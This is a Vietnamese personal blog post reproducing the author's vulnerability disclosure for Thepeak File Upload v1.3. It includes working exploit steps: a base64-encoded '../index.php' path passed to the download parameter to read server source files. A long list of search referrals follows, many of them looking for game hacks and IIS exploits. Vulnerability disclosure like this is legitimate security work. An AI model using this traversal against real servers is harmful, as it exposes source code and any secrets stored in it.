Download nhạc từ các trang nhạc lớn của Việt Nam

31 Tháng Mười 2006
@ 02:27
(Được đăng bởi: Phạm Đức Hải)
Hí hí, mấy ngày nay không vào securityfocus.com, hôm nay vào thấy nó đã submit bug của mình report lần trước.
Thepeak File Upload v1.3 : Read file vulneability
Thepeak Index.PHP Source Code Information Disclosure Vulnerability
Mà cả tuần nay không có thời gian đọc thêm về secu.

Thepeak File Upload v1.3 : Read file vulneability
Discovered By: Phạm Đức Hải (Pham Duc Hai)
Email: duchaikhtn (at) gmail (dot) com
YIM : kiki_coco1985vn
Website: http://blog.ajaxviet.com
-------------------------
Description:
file upload manager 1.3
written by thepeak (adam medici)
copyright (c) 2003 thepeak of mtnpeak.net
A simple, powerful tool to upload and manage files using your web browser.

There are some bugs in Thepeak File Upload v1.3 :
http://www.securityfocus.com/archive/1/378494
Today, I find out a bug in Thepeak File Upload v1.3 , this bug allows attacker
can download source file(.php,...) from server.
-------------------------
Exploit :
http://somesite.com/example/index.php --> upload form
Now, we upload one file to server, ex : test.jpg -->ok
We have its url to view it : http://somesite.com/example/index.php?act=view&file=dGVzdC5qcGc=
anh url to download it : http://somesite.com/example/index.php?act=dl&file=dGVzdC5qcGc=
Notice that the value "dGVzdC5qcGc=" of parameter file is encoded 64 of " test.jpg"
We need get source file http://somesite.com/index.php.
Encode 64 path to index.php above : ../index.php --> Li4vaW5kZXgucGhw
==> we have the link to download source file index.php (notice act=dl)

http://somesite.com/example/index.php?act=dl&file=Li4vaW5kZXgucGhw

You can also download other files.
Have fun!
Ý kiến [0] - Chuyên mục: Bảo mật | Hack

Referred by:
securityfocus (www.google.com.vn) [Referral]
securityfocus (www.google.com.vn) [Referral]
securityfocus (www.google.com.vn) [Referral]
hack tool site:guru.net.vn (www.google.com.vn) [Referral]
file upload manager 1.3 mtnpeak download (www.google.com.vn) [Referral]
securityfocus (www.google.com.vn) [Referral]
code upload v1.3 © thepeak (www.google.com.vn) [Referral]
bug v1.3 © thepeak (www.google.com.vn) [Referral]
kshell 1.3 (www.google.com.vn) [Referral]
securityfocus (www.google.com.vn) [Referral]
bug upload (www.google.com.vn) [Referral]
SecurityFocus (www.google.com.vn) [Referral]
securityfocus.com (www.google.com.vn) [Referral]
securityfocus.com (www.google.com.vn) [Referral]
bug website (www.google.com.vn) [Referral]
securityfocus.com ddos (www.google.com.vn) [Referral]
Bug tru tiên (www.google.com.vn) [Referral]
bug tru tien (www.google.com.vn) [Referral]
url encoded64 (www.google.com.vn) [Referral]
report bugs tru tiên (www.google.com.vn) [Referral]
securityfocus (www.google.com.vn) [Referral]
bug Tru Tien (www.google.com.vn) [Referral]
securityfocus (www.google.com.vn) [Referral]
download hack Bug au (www.google.com.vn) [Referral]
loi ReportBugs tru tien (www.google.com.vn) [Referral]
bug trutien (www.google.com.vn) [Referral]
bug tru tien (www.google.com.vn) [Referral]
tjm link download hack bug do` au (www.google.com.vn) [Referral]
webdav bug (www.google.com.vn) [Referral]
download DaTa hack bug Do au (www.google.com.vn) [Referral]
reportbugs tru tien (www.google.com.vn) [Referral]
bug do au (www.google.com.vn) [Referral]
bug WebDav (www.google.com.vn) [Referral]
bug do au (www.google.com.vn) [Referral]
security focus (www.google.com.vn) [Referral]
hack bug do au (www.google.com.vn) [Referral]
blog hack bug do au (www.google.com.vn) [Referral]
bug au (www.google.com.vn) [Referral]
bug do audition 1.3 (www.google.com.vn) [Referral]
bug do (www.google.com.vn) [Referral]
webdav bug (www.google.com.vn) [Referral]
Securityfocus (www.google.com.vn) [Referral]
bug au (www.google.com.vn) [Referral]
cach Bug au (www.google.com.vn) [Referral]
Download hack bug do au (www.google.com.vn) [Referral]
bug (www.google.com.vn) [Referral]
download virus bug do au (www.google.com.vn) [Referral]
bug do au (www.google.com.vn) [Referral]
hack bug trutien (www.google.com.vn) [Referral]
www.securityfocus. com (www.google.com.vn) [Referral]
dow bug do au (www.google.com) [Referral]
bug file AU (www.google.com.vn) [Referral]
dow bug do audition (www.google.com.vn) [Referral]
DownloadData hack audition (www.google.com.vn) [Referral]
bug au (www.google.com.vn) [Referral]
hack bug do au (www.google.com.vn) [Referral]
hack bug do au (www.google.com.vn) [Referral]
securityFocus (www.google.com.vn) [Referral]
download hack bug (www.google.com.vn) [Referral]
bug au (www.google.com.vn) [Referral]
bug do au Ok (www.google.com.vn) [Referral]
bug tru tiên (www.google.com.vn) [Referral]
file bug do au (www.google.com.vn) [Referral]
security focus (www.google.com.vn) [Referral]
down link bug do au (www.google.com.vn) [Referral]
download bug do au (www.google.com.vn) [Referral]
securityfocus (www.google.com.vn) [Referral]
securityfocus (www.google.com.vn) [Referral]
bug upload (www.google.com.vn) [Referral]
bug do au bang data (www.google.com.vn) [Referral]
loi reportbugs trong trutien (www.google.com.vn) [Referral]
bug do au (www.google.com.vn) [Referral]
file chong bug do audition (www.google.com.vn) [Referral]
hack bug do audition (www.google.com.vn) [Referral]
hack bug do` audition moi nhat (www.google.com.vn) [Referral]
bug tru tien (www.google.com.vn) [Referral]
hack do au (vn.search.yahoo.com) [Referral]
nhac cua toi (www.google.com.vn) [Referral]
blog bug vn (www.google.com.vn) [Referral]
bug do au (vn.search.yahoo.com) [Referral]
hack do au (vn.search.yahoo.com) [Referral]
download link hack bug audition (www.google.com.vn) [Referral]
hack bug do audition (www.google.com.vn) [Referral]
securityfocus.com (www.google.com.vn) [Referral]
loi ReportBugs Tru Tien (www.google.com.vn) [Referral]
hack bug do` Au (www.google.com.vn) [Referral]
dowload bug au (www.google.com.vn) [Referral]
bug do au (www.google.com.vn) [Referral]
php bugs (www.google.com.vn) [Referral]
"bug do audition" (www.google.com.vn) [Referral]
security focus (www.google.com.vn) [Referral]
securityfocus (www.google.com.vn) [Referral]
"bug tru tiên" (www.google.com.vn) [Referral]
bug au (www.google.com.vn) [Referral]
file chong Bug Au (www.google.com.vn) [Referral]
"bug do au (www.google.com.vn) [Referral]
bug do au thang 9 (www.google.com.vn) [Referral]
dowload bug do audition (www.google.com.vn) [Referral]
hach audition (www.google.com.vn) [Referral]
hack bug upload php (www.google.com.vn) [Referral]
bug upload (www.google.com.vn) [Referral]
hack bug do au (www.google.com.vn) [Referral]
bug au (www.google.com.vn) [Referral]
bug au (www.google.com.vn) [Referral]
cach bug au (www.google.com.vn) [Referral]
cach day bug do au (www.google.com.vn) [Referral]
download data au (www.google.com.vn) [Referral]
bug au (www.google.com.vn) [Referral]
File bug Au (www.google.com.vn) [Referral]
hack bug do audition (www.google.com.vn) [Referral]
dow bug do audition (www.google.com.vn) [Referral]
http://www.google.com.vn/ [Referral]
web bug do au (www.google.com.vn) [Referral]
file bug audition (www.google.com.vn) [Referral]
hack bug au (www.google.com.vn) [Referral]
file bug Au (www.google.com.vn) [Referral]
cach bug do au (www.google.com.vn) [Referral]
cach bug do trong au (www.bing.com) [Referral]
link bug do au (www.google.com.vn) [Referral]
link dowload data san` au (www.google.com.vn) [Referral]
cach bug do au (www.google.com.vn) [Referral]
wed download bug do audition (www.google.com.vn) [Referral]
dow bug au (www.google.com.vn) [Referral]
download hack bug do audition (www.google.com.vn) [Referral]
lỗi ReportBugs tru tiên (www.google.com.vn) [Referral]
tru tien bi loi reportbugs (www.google.com.vn) [Referral]
loi reportbugs tru tien (www.google.com.vn) [Referral]
loi reportbugs tru tien (www.google.com.vn) [Referral]
hack bug do audition (www.google.com.vn) [Referral]
reportbugs trong tru tien (www.google.com.vn) [Referral]
download bug do au (www.google.com.vn) [Referral]
reportbugs tru tien (www.google.com.vn) [Referral]
loi ReportBugs tru tien (www.google.com.vn) [Referral]
bug remote ms IIS 5.0 (www.google.com.vn) [Referral]
securityfocus (www.google.com.vn) [Referral]
downloaf hack bug do au (www.google.com.vn) [Referral]
download bug au (www.google.com.vn) [Referral]
hack do au (vn.search.yahoo.com) [Referral]
bug tru tien (www.google.com.vn) [Referral]
data bug au (www.google.com.vn) [Referral]
reportbug tru tien (www.google.com.vn) [Referral]
bug web (www.google.com.vn) [Referral]
dow bug do au (www.google.com.vn) [Referral]
security focus (www.google.com.vn) [Referral]
phuc bug report cua tru tien (www.google.com.vn) [Referral]
bug au (www.google.com.vn) [Referral]
bug au (www.google.com.vn) [Referral]
bug au (www.google.com.vn) [Referral]
"bug do trong Au" (www.google.com.vn) [Referral]
bug tru tien (www.google.com.vn) [Referral]
IIS 6 DAV bug (www.google.com.vn) [Referral]
bugdo au 9 (www.google.com.vn) [Referral]
bug Au (www.google.com.vn) [Referral]
bug + PortalOffice 2009 (VSS) (www.google.com.vn) [Referral]
download bug do au (www.google.com.vn) [Referral]
code + "File Upload Manager" + download (www.google.com.vn) [Referral]
File Upload Manager v1.3 (www.google.com.vn) [Referral]
dowload bug do au (www.google.com.vn) [Referral]
dow hack bug audition (www.google.com.vn) [Referral]
hack bug do au (www.google.com.vn) [Referral]
bug do (vn.search.yahoo.com) [Referral]
bug do au thang 9 (www.google.com.vn) [Referral]
hack bug do trong audition (www.google.com.vn) [Referral]
bug do audition (vn.search.yahoo.com) [Referral]
bug tru tien (www.google.com.vn) [Referral]
hack bug do au moi nhat (www.google.com.vn) [Referral]
download hack tru tien (www.google.com.vn) [Referral]
cach bug do` trong au (www.google.com.vn) [Referral]
bug au (www.google.com.vn) [Referral]
bug aodition (www.google.com.vn) [Referral]
bug aodition (www.google.com.vn) [Referral]
bug upload (www.google.com.vn) [Referral]
bug audition (search.conduit.com) [Referral]
bug audition (www.google.com.vn) [Referral]
download data au (www.google.com.vn) [Referral]
securityfocus (www.google.com.vn) [Referral]
am nhac thang9 (www.google.com.vn) [Referral]
hachaudition downloads (vn.search.yahoo.com) [Referral]
hack bug audition (vn.search.yahoo.com) [Referral]
bug do audition (vn.search.yahoo.com) [Referral]
cach bug do au (vn.search.yahoo.com) [Referral]
hack bug (vn.search.yahoo.com) [Referral]
encode64 php (www.google.com.vn) [Referral]
game tru tien bi loi reportbugs (www.google.com.vn) [Referral]
"download bug au" (www.google.com.vn) [Referral]
hachaudition downloads (vn.search.yahoo.com) [Referral]
tim kiem bug tren securityforcus (www.google.com.vn) [Referral]
bug trutien (www.google.com.vn) [Referral]
loi report bug tru tien (www.google.com.vn) [Referral]
loi ReportBugs trong game (www.google.com.vn) [Referral]
bug audition (www.google.com.vn) [Referral]
bug audition (www.google.com.vn) [Referral]
anh aodition (vn.search.yahoo.com) [Referral]
hack do au (vn.search.yahoo.com) [Referral]
tai bug au (www.google.com.vn) [Referral]
bug upload (www.google.com.vn) [Referral]
securityfocus (www.google.com.vn) [Referral]
downloaf.com.vn (www.google.com.vn) [Referral]
"hack bug do audition" (www.google.com.vn) [Referral]
bi loi reportbugs cua tru tien (www.google.com.vn) [Referral]
cach bug do au (vn.search.yahoo.com) [Referral]
download hack bug do au (www.google.com.vn) [Referral]
hack bug do tru tien (www.google.com.vn) [Referral]
dowload hack bug au (www.google.com.vn) [Referral]
hack tru tien (vn.search.yahoo.com) [Referral]
bug web (www.google.com.vn) [Referral]
hack bug tru tien (www.google.com.vn) [Referral]
bug do au ok (www.google.com.vn) [Referral]
dow hack bug do au (vn.search.yahoo.com) [Referral]
bug tru tien (www.google.com.vn) [Referral]
"loi report bug tru tien" (www.google.com.vn) [Referral]
bug tru tiên (www.google.com.vn) [Referral]
securityfocus Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (www.google.com.vn) [Referral]
"lỗi reportbugs" (www.google.com.vn) [Referral]
"lỗi reportbugs" (www.google.com.vn) [Referral]
bug upload php (www.google.com.vn) [Referral]
cach bug tru tien (www.google.com.vn) [Referral]
hack iis 5 unicode bug (www.google.com.vn) [Referral]
kshell 1.3 (www.google.com.vn) [Referral]
bug moi cua iis (www.google.com.vn) [Referral]
securityfocus.com (www.google.com.vn) [Referral]
hack bug do trong au (www.google.com.vn) [Referral]
cach bug trong audition (www.google.com) [Referral]
bug tru tien] (www.google.com.vn) [Referral]
test bug do` au (www.google.com.vn) [Referral]
WebDAV Remote Authentication Bypass Exploit (www.google.com.vn) [Referral]
bug tru tien (www.google.com.vn) [Referral]
lỗi reportbugs trên win 7 (www.google.com.vn) [Referral]
bug loi iis 6.0 (www.google.com.vn) [Referral]
"bug do trong audition" (www.google.com.vn) [Referral]
bug IIS 6.0 (www.google.com.vn) [Referral]
bug IIS wbdav 6.0 (www.google.com.vn) [Referral]
webdav bug (www.google.com.vn) [Referral]
hack bug tru tien (www.google.com.vn) [Referral]
SecurityFocus (www.google.com.vn) [Referral]
http://www.netvibes.com/wellbutrin [Referral]
lỗi reportbugs (www.google.com.vn) [Referral]
loi reportbugs (www.google.com.vn) [Referral]
File Upload Manager v1.3 © thepeak (www.google.com.vn) [Referral]
"bug IIS 6.0" (www.google.com.vn) [Referral]
bug tru tiên (www.google.com.vn) [Referral]
test WebDAV Microsoft IIS 6.0 (www.google.com.vn) [Referral]
Microsoft IIS 6.0 WebDAV Remote Authentication Bypass (www.google.com.vn) [Referral]
file bug do audition (www.google.com.vn) [Referral]
Hack IIS server bằng UNICODE bug (www.google.com.vn) [Referral]
reportbugs tru tien (www.google.com.vn) [Referral]
bi loi reportbugs (www.google.com.vn) [Referral]
bug Tien ms (www.google.com.vn) [Referral]
security php on securityfocus (www.google.com.vn) [Referral]
bug au moi nhat (www.google.com.vn) [Referral]
loi reportbugs tru tien (www.google.com.vn) [Referral]
bug upload (www.google.com.vn) [Referral]
http://github.com/uroxatral [Referral]
code php check bug webdav hacker (www.google.com.vn) [Referral]
securityfocus (www.google.com.vn) [Referral]
how to find a bug (www.google.com.vn) [Referral]
securityfocus (www.google.com.vn) [Referral]
security focus (www.google.com.vn) [Referral]
hack bug do au (vn.search.yahoo.com) [Referral]
WebDAV bug (www.google.com.vn) [Referral]
bug dau (www.google.com.vn) [Referral]
hackdoau.tk (www.google.com.vn) [Referral]
securityfocus (www.google.com.vn) [Referral]
reportbugs trutien (www.google.com.vn) [Referral]
trutien reportbugs (www.google.com.vn) [Referral]
BUG CANH TRONG AU (www.google.com.vn) [Referral]
how to find a bug in a php file (www.google.com.vn) [Referral]
how to find bug in a source code (www.google.com.vn) [Referral]
blog bug do au (www.google.com.vn) [Referral]
authentication bypass bug report (www.google.com.vn) [Referral]
day cach bugdo trong game audition (www.google.com.vn) [Referral]
security focus (www.google.com.vn) [Referral]
securityfocus (www.google.com.vn) [Referral]
"hack bug do au" (www.google.com.vn) [Referral]
Download data audition dau tien (www.google.com) [Referral]
hack bug tru tien (www.google.com.vn) [Referral]